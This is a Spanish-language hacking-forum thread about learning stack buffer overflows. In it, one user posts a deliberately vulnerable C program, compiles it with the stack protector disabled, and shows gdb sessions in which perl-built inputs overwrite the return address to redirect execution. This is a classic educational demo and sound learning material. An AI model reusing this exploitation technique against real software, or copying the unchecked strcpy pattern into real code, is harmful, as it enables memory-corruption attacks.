Duda sobre buffer overflow

buscador-tecnologico · 25 Diciembre 2011, 19:42 PM

ostias, y ese libro? parece interesante,no? el titulo del libro es: shellcoders sobre exploits? de que escritor?

100000 gracias y feliz navidad amigos!

Sagrini · 1 Enero 2012, 18:16 PM

Ahora mismo estoy un poco liadillo, te paso una url que tal vez te sirva y en un ratillo me pongo

http://foro.elhacker.net/bugs_y_exploits/first_bof_linux_attack_sagrini_2010_elhackernet_funciona-t317514.0.html

pianista · 1 Enero 2012, 19:40 PM

Muchas gracias

Te lo agradezco

Saludos

AlbertoBSD · 1 Enero 2012, 20:13 PM

Pianista muy buenos dias, y exito este año!

¿Que libro estas siguiendo?

La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input

Saludos.

Sagrini · 1 Enero 2012, 23:03 PM

Código (c) [Seleccionar]


#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int vuln (char *buff)
{
    char buffer [36];
    strcpy (buffer, buff);
}

int main (int argc, char *argv [])
{
    vuln (argv [1]);
}

int feo ()
{
    printf ("Eres feo!!!");
    exit (0);
}

Código [Seleccionar]


sagrini@pc11-1:~/Escritorio$ nano code.c
sagrini@pc11-1:~/Escritorio$ gcc -o code code.c --no-stack-protector
sagrini@pc11-1:~/Escritorio$ gdb -q code
(gdb) r $(perl -e 'print "A"x36 . "BBBB"x3')
Program received signal SIGSEGV, Segmentation fault.
0x08048408 in __do_global_dtors_aux ()
(gdb)
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) x/x feo
0x8048489 <feo>: 0x83e58955
(gdb) r $(perl -e 'print "\x90"x36 . "\x89\x84\x04\x08"x5')
Eres feo!!!
(gdb) quit
sagrini@pc11-1:~/Escritorio$

Ahora modifico para que funcione con una shellcode

adulti · 5 Enero 2012, 02:53 AM

¿Que libro estas siguiendo?

La idea es la misma, sobreescribir la direccion de retorno con aquella que quieras que se ejecute, en este caso quieres que se ejecute 2 veces el printf dentro de la funcion return_input

AlbertoBSD · 5 Enero 2012, 16:08 PM

Funciono?

Sagrini · 5 Enero 2012, 17:38 PM

El que? Lo mio, perfectamente.
Os recomiendo el libro "Hacking, técnicas avanzadas", de Jon Erickson. Es buenisimo.

<<<-Basura->>> · 7 Enero 2012, 04:51 AM

Mm.. se que el comentario no viene al caso, pero podrías pasar el link del libro para descargarlo y yo también leerlo

pianista · 8 Enero 2012, 19:56 PM

Disculpad, las fiestas navideñas es lo que tienen, ya estoy de nuevo por aquí jeje.

Ahora lo voy a probar que he estado liado desde entonces.

El libro es: The Shellcoders handbook

Lo compré en amazon aunque tiene bastantes años.

Luego por otro lado había uno muy majo que era el de The art of exploitation o algo así.

Saludos